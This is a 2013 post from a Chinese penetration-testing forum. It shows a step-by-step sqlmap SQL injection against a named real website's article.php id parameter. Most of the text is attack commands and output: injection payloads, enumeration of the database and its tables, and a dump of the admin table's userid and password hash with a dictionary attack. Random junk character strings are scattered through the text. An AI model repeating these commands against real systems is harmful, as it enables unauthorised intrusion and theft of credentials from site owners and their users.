中国网络渗透测试联盟

标题: sqlmap实例注入mysql [打印本页]
作者: admin    时间: 2013-4-4 22:18
标题: sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! z; W. }+ _& p
ms "Mysql" --current-user       /*  注解:获取当前用户名称
% y* I2 }0 }2 Y7 K# q    sqlmap/0.9 - automatic SQL injection and database takeover tool
5 E" t3 ~- [5 x7 b$ [    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    5 d# F# F. w1 M! \/ ]$ }( T[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    - e2 ?; f& u0 I/ B. J session file; d4 W$ P  B; j$ Z$ @! ~7 ~
    [16:53:54] [INFO] resuming injection data from session file6 J' B, f% P* b2 x
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    " J: K4 w# Q) p4 E7 J3 n! c! B[16:53:54] [INFO] testing connection to the target url
    8 n; F4 @" A( @: Gsqlmap identified the following injection points with a total of 0 HTTP(s) reque4 ?" `- T! M6 K: ?/ k4 l: x" u  }  i$ f
    sts:8 i2 M0 n$ d. W0 @1 Q  P) H- \; o& C
    ---# j+ R! I* Q+ t0 l
    Place: GET
    2 S2 X/ y' |" B6 M/ E. r# A- s. {+ PParameter: id
    5 A! P- X2 F: f/ ]% A1 C    Type: boolean-based blind
    5 R5 p; x6 T! ^  A+ e# A    Title: AND boolean-based blind - WHERE or HAVING clause
    + F  H9 P: U# ?+ k    Payload: id=276 AND 799=799/ s( g3 M- i: @0 @
        Type: error-based5 \0 T  t+ _2 \/ a+ h( d) \
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 m8 O  y  j; ]/ f0 b
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 {# K) a  O; k  d120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) q& `# P1 }( h* z( h- j2 n
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ; i$ I0 R$ U1 F4 a! B    Type: UNION query
      O2 s% F, u9 L- w' i    Title: MySQL UNION query (NULL) - 1 to 10 columns% ~+ O- q# y0 e4 V; X
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 X: \0 u5 ?7 w0 t# J% k! M
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    $ t$ A; I; w9 s5 c1 ~0 H+ WCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    - v* N6 q& V5 E5 O" T7 C    Type: AND/OR time-based blind3 \# @3 D( N; t% Z* H: o
        Title: MySQL > 5.0.11 AND time-based blind5 i% c# d  }2 V3 u6 M
        Payload: id=276 AND SLEEP(5)4 p. S4 K. @8 k( h! D
    ---
    % g" i& A; U; T; c& [5 n/ T3 a+ p[16:53:55] [INFO] the back-end DBMS is MySQL
    + }0 h+ G2 T9 D6 D: Fweb server operating system: Windows  @- T, p2 A6 l- `: Q  W
    web application technology: Apache 2.2.11, PHP 5.3.0
    5 r9 |6 v2 x3 @4 J0 bback-end DBMS: MySQL 5.01 |6 t. S& k# U, g, O: r* P
    [16:53:55] [INFO] fetching current user. N/ t& ^% {9 W
    current user:    'root@localhost'   . J# e% j/ [2 N8 }6 V8 Y  h) B
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    - p7 K9 s" f; z* d- U/ G0 htput\www.wepost.com.hk'
  • shutting down at: 16:53:584 f4 Z$ x, B8 S0 C/ r3 Q

    & e1 D% d$ U8 V1 uD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; k5 ^  a! ]& T6 e  i# a* S
    ms "Mysql" --current-db                  /*当前数据库3 J: F/ p2 A& i# Q
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    8 Y+ l/ P( }# A, c4 o+ z    http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    $ R" Y% Z5 l( p' Q4 R; |[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    3 S+ M6 u: q0 V6 q  m* `" k session file
    / f: B5 R) q' |  \- q[16:54:16] [INFO] resuming injection data from session file* c1 L" t1 S; f- p4 ~& D
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file! i8 B: {% f; F3 l. S
    [16:54:16] [INFO] testing connection to the target url
    $ _' L6 O# h/ U7 C  q' a: r, Lsqlmap identified the following injection points with a total of 0 HTTP(s) reque5 a9 N0 R/ [$ R( ^
    sts:' N) N2 t; u: ^  S
    ---
    1 G( e' t  s! O' mPlace: GET! J) Q) Y" V4 o: G6 o
    Parameter: id6 P' Q6 N3 y# L0 M  k4 ]$ k% \* F
        Type: boolean-based blind
    * D+ ]8 {0 Q: u. g. D. K3 C    Title: AND boolean-based blind - WHERE or HAVING clause( N% m  p4 h, b* v% ^* R: w
        Payload: id=276 AND 799=799
    ) a- ~6 Y: ^1 N    Type: error-based
    $ K. n! s- A; o5 `# @    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    6 \4 O3 ]% X% ~    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,, \  c1 r$ |& z, {5 f5 y4 J# ^  r
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,589 R3 b1 k3 i0 u
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 f' I  F- m: a" O" i
        Type: UNION query8 B2 g$ i) ^* t. @+ @6 z% {
        Title: MySQL UNION query (NULL) - 1 to 10 columns0 g3 L$ I( i5 ~3 H1 t
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ) o. y! o! i' X+ Y2 [" t3 }(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    + G: N4 u, ?$ p% g; J/ J6 ?CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    . M4 [8 M* t0 d/ }8 N    Type: AND/OR time-based blind
    5 I$ X6 a; t( J4 {  v/ d8 h+ [5 T9 L    Title: MySQL > 5.0.11 AND time-based blind
    ' o" f; E* V2 @4 r4 k2 @    Payload: id=276 AND SLEEP(5)
    4 U1 x# D0 c  X' y4 Q---
    8 U( Q$ D3 D: D  s7 i/ m8 v[16:54:17] [INFO] the back-end DBMS is MySQL
    # t+ x' l9 q9 b( T& M0 n: oweb server operating system: Windows
    4 h9 `( t+ M$ B9 `: U. Kweb application technology: Apache 2.2.11, PHP 5.3.03 a+ C6 P: M* N% w. \/ ]# `: m( Q
    back-end DBMS: MySQL 5.0
    8 [! ?% E: O4 V$ Q! ]* \[16:54:17] [INFO] fetching current database+ N0 A" v+ k  D( U
    current database:    'wepost'4 b7 B' n8 l( e. F7 G4 O4 U" k1 m
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; I& Y2 K8 T7 \9 S1 |% V
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    % @1 p: D# p0 _9 j. {2 m0 LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    - q0 T. T- A0 ~ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名% C+ f! a, W) ^. B/ a
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ( l! r5 B: P4 k1 \# M    http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    $ f# \/ R) @1 x8 ~0 u[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    9 Z; ~' I+ [- D& y session file0 t& P+ R! t3 S, G6 z5 I* C
    [16:55:25] [INFO] resuming injection data from session file
    3 L' y! \0 ]; h4 I5 Y' h[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file0 W1 ~$ ~! m3 L% X, J! e( X
    [16:55:25] [INFO] testing connection to the target url
    5 r; ^: h! E2 zsqlmap identified the following injection points with a total of 0 HTTP(s) reque$ G' s( y8 a3 g7 ]' B
    sts:
    ' r7 G3 Y6 t9 p; r; b---
    5 O* V9 a$ B: m% S! v' sPlace: GET
    7 k$ T3 T. {' R! \' G# |Parameter: id# }; v  u3 C* S
        Type: boolean-based blind  C% J( f. Q- @
        Title: AND boolean-based blind - WHERE or HAVING clause
    : V1 t0 X2 Q* Z1 J6 L    Payload: id=276 AND 799=799! `8 D2 P& t1 V+ d. N  V
        Type: error-based) e/ c4 w# D4 z! w! D7 K  x
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    , W' z1 X" X2 A$ w    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    * S6 d' c9 W2 h4 T6 R" j4 s% C120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    5 k  d" h7 x+ f  D; R6 a8 x),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ |5 a. A# n3 M: S
        Type: UNION query
    9 o0 ~' G7 L# \# f- @7 Y    Title: MySQL UNION query (NULL) - 1 to 10 columns
    " |+ s+ K* U  O( k  u    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ( I( }7 _; F4 M( h9 P1 @8 ?) ](58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),3 H, @7 w7 T, w2 u% z  g7 z
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    5 O: x/ b, B: J/ z    Type: AND/OR time-based blind
    * a7 R) C1 l' G$ o. \# t+ h    Title: MySQL > 5.0.11 AND time-based blind
    3 t' |) a; D+ y    Payload: id=276 AND SLEEP(5)
    ) N- h- {/ c6 L6 F. k. q---. |& N* R! f  K" s& b
    [16:55:26] [INFO] the back-end DBMS is MySQL
    0 m2 _4 {8 p# j% x& dweb server operating system: Windows& Z: h9 ^  ~* Q) s3 ^- n
    web application technology: Apache 2.2.11, PHP 5.3.0
    1 z5 |1 \9 W1 D! ]" Y/ r! \back-end DBMS: MySQL 5.0
    + a# N, B& v1 [, T$ u[16:55:26] [INFO] fetching tables for database 'wepost'
    6 ]( ]+ ]3 ^6 @& u[16:55:27] [INFO] the SQL query used returns 6 entries1 u) J" _+ u6 T7 W. y8 e+ o
    Database: wepost1 ?3 J" ]) v4 a$ H* N; q
    [6 tables]- c7 T( a" X. Z
    +-------------+
    / |( ~8 M0 H8 l# I: f; X/ u1 I' f| admin       |
    3 D4 N( ?4 n8 k( b* L/ o| article     |* h( C! n1 J3 f. Z% o
    | contributor |0 D' E" s# F: r# j7 Y# `5 `
    | idea        |
    2 }1 {3 I& t0 c" b6 Y1 D| image       |
    # Z% v- V. _( z' n/ |, K( t| issue       |
    . s* Z  z! ]& O/ I# s: S+-------------+) q# s# e0 X) H6 l
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    $ L1 k$ B* X% d6 p& \: ^% htput\www.wepost.com.hk'
  • shutting down at: 16:55:338 ?, x* K4 ]1 d* \: {& D7 `) b2 T( H
    3 W! k% W/ G0 ~: u3 D$ h
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    $ E7 c& r' D5 l/ ?5 p9 j- tms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    ; g! d: ^6 P; I, X    sqlmap/0.9 - automatic SQL injection and database takeover tool. {" y- \7 Y1 O9 P7 x, n/ P
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    2 a; T2 [: b( E' A' ysqlmap identified the following injection points with a total of 0 HTTP(s) reque
    5 ^. o/ Y  h! v$ U/ T# ?+ jsts:
    + m$ p1 b5 n: \2 f6 N- F---
    6 O, H9 Y5 b2 j/ s/ B/ |7 OPlace: GET# }0 b6 I4 ^, r& p4 t
    Parameter: id% j7 S+ ^$ w8 U( j; J& g7 D
        Type: boolean-based blind
      t# Y, P* }$ @  K; }& V2 Y4 y    Title: AND boolean-based blind - WHERE or HAVING clause3 E; r  I/ t: X* H" G
        Payload: id=276 AND 799=799
    * O8 j) [  N' d+ c    Type: error-based' U3 t) n5 P+ p. J' `
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 ~4 N$ x. ?0 a; k1 ?
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,! j5 B) O' f7 D+ Q- K: s' X  h
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    : ]; e, t1 k6 S4 r+ V3 i6 S7 q5 Z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 w" Y& j& c$ V. U; c
        Type: UNION query  n9 L+ d$ F9 E: R; z7 n$ W
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    - ?9 ?" f  {: T( C- i7 ^    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR  j+ S) i# n8 Y& ?; @" J9 c: u
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, d8 a: f, {5 ]# D5 X. {( H1 J
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    6 }& q7 G  u. P3 ?  o2 Z    Type: AND/OR time-based blind
    5 m" Q7 K4 p, m' q6 {% P" w1 Q    Title: MySQL > 5.0.11 AND time-based blind  Q& F( k8 ^9 r* f9 |% h. k- t" `
        Payload: id=276 AND SLEEP(5)- N& J: `/ c( C
    ---
    - O0 y5 }; _1 v$ V# zweb server operating system: Windows
    7 D+ A  h' f2 b9 l8 Fweb application technology: Apache 2.2.11, PHP 5.3.0
    2 \% C7 q0 M8 d2 a  Uback-end DBMS: MySQL 5.0
    ; U0 Q: W8 Y% i. W2 e7 ?- Y0 p1 ~[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se/ g& l/ v9 l6 Y0 u) E) r+ F# U! m
    ssion': wepost, wepost
    3 m* B7 s2 [6 T9 ^2 pDatabase: wepost
    " W- h. ~6 S9 Z+ H5 R7 }Table: admin) [0 X7 e; z2 t4 L+ u
    [4 columns]
      x5 ~: N6 B, f: q' l! B3 `2 G+----------+-------------+& U! P$ v' Q. q6 m, M# m
    | Column   | Type        |- t' S! y0 ~+ z, f* r$ M
    +----------+-------------+* @8 {6 f( Z1 u* p3 e: x$ p3 Y0 X
    | id       | int(11)     |
    % p1 L. o- d4 y) G$ q| password | varchar(32) |
    : X& y; a4 g) ^: |; s, H, v| type     | varchar(10) |. j. B6 r5 a) E
    | userid   | varchar(20) |
    5 I+ W$ m& g# V7 s; u+----------+-------------+! ?: A) a, a( H( a% |3 V; O
  • shutting down at: 16:56:19
    ; h% m8 K3 r: m" o( `$ A. y) C
    3 `" w# b- C+ J5 ?$ {D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# }* g( ]' V4 [
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    6 ^! k5 L& i! k% |    sqlmap/0.9 - automatic SQL injection and database takeover tool
    & B* A0 @6 @! C1 T; r0 e& w! x    http://sqlmap.sourceforge.net
  • starting at: 16:57:145 |# D4 w5 f; N& k# K2 D& |: m
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    : ], a8 ?+ [' a& w4 ksts:: w" S% z. O8 \9 y2 A8 L, q
    ---) U/ J; P$ g4 Z$ `% {
    Place: GET
    1 `9 b- G1 N& B. qParameter: id5 p1 @( y4 n+ j: P! h2 t- X
        Type: boolean-based blind  X0 R; v1 d7 E) M' ]
        Title: AND boolean-based blind - WHERE or HAVING clause
    " B! {) ~5 M: {. l; O    Payload: id=276 AND 799=799' o% A0 W2 R' O* C6 l5 F
        Type: error-based9 `5 N- n. k6 W9 v3 S
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ {' u# W6 b4 U
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 D& {0 o, J4 _( S' R$ p
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    6 i, K0 L& z5 [: v& z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" P, Z7 Q" B# k
        Type: UNION query
    ) Y+ ]4 o2 {% w    Title: MySQL UNION query (NULL) - 1 to 10 columns- y5 `! u, w4 O* p2 K3 I
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    9 R$ X6 V: \$ V8 Q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ! j+ D$ i! p( e9 r) Y3 w+ \CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    8 ]2 Q( s4 j; V* _% Q    Type: AND/OR time-based blind7 J! n; k( h! R" L) _
        Title: MySQL > 5.0.11 AND time-based blind
    ; Z( L) f& T2 i, p+ Q" u    Payload: id=276 AND SLEEP(5)
    4 r" T: P0 b0 F% S9 [7 @0 X---+ j1 `% g0 y$ [
    web server operating system: Windows1 N% g5 x) \3 V/ w! D5 F
    web application technology: Apache 2.2.11, PHP 5.3.0
    - r. z: ]  o) ~% z) uback-end DBMS: MySQL 5.0+ B4 J/ a6 }# A/ j5 q
    recognized possible password hash values. do you want to use dictionary attack o
    5 X9 q# ]" P5 E) X8 {# `- R# \' P. P3 ]n retrieved table items? [Y/n/q] y- y2 M6 h9 B: H- v2 m3 C# N* `; E
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]' S8 T+ A( g* s0 E- C% C$ e
    do you want to use common password suffixes? (slow!) [y/N] y- i$ ~# S0 f- c  z; @/ b
    Database: wepost
    2 m1 K% N; K4 J# f# B% ~Table: admin
      |: n* M* P! h3 D/ u$ i[1 entry]
    5 `4 F! W: i6 u5 g+----------------------------------+------------+' H0 V4 M/ G  q) o7 A* d( C" B
    | password                         | userid     |
    $ S; O6 F3 G5 g$ ~' ^7 V$ m1 d5 n0 |+----------------------------------+------------+; C& M" l' l; U& ]2 o1 u& Y
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |" N0 y- _4 i! u8 `1 Y( S
    +----------------------------------+------------+
    / P4 S6 p" g/ |8 `) G
  • shutting down at: 16:58:14
    ) Y% q3 e$ Y% c9 E( w+ k) N6 |( V! b* E
    D:\Python27\sqlmap>



    欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2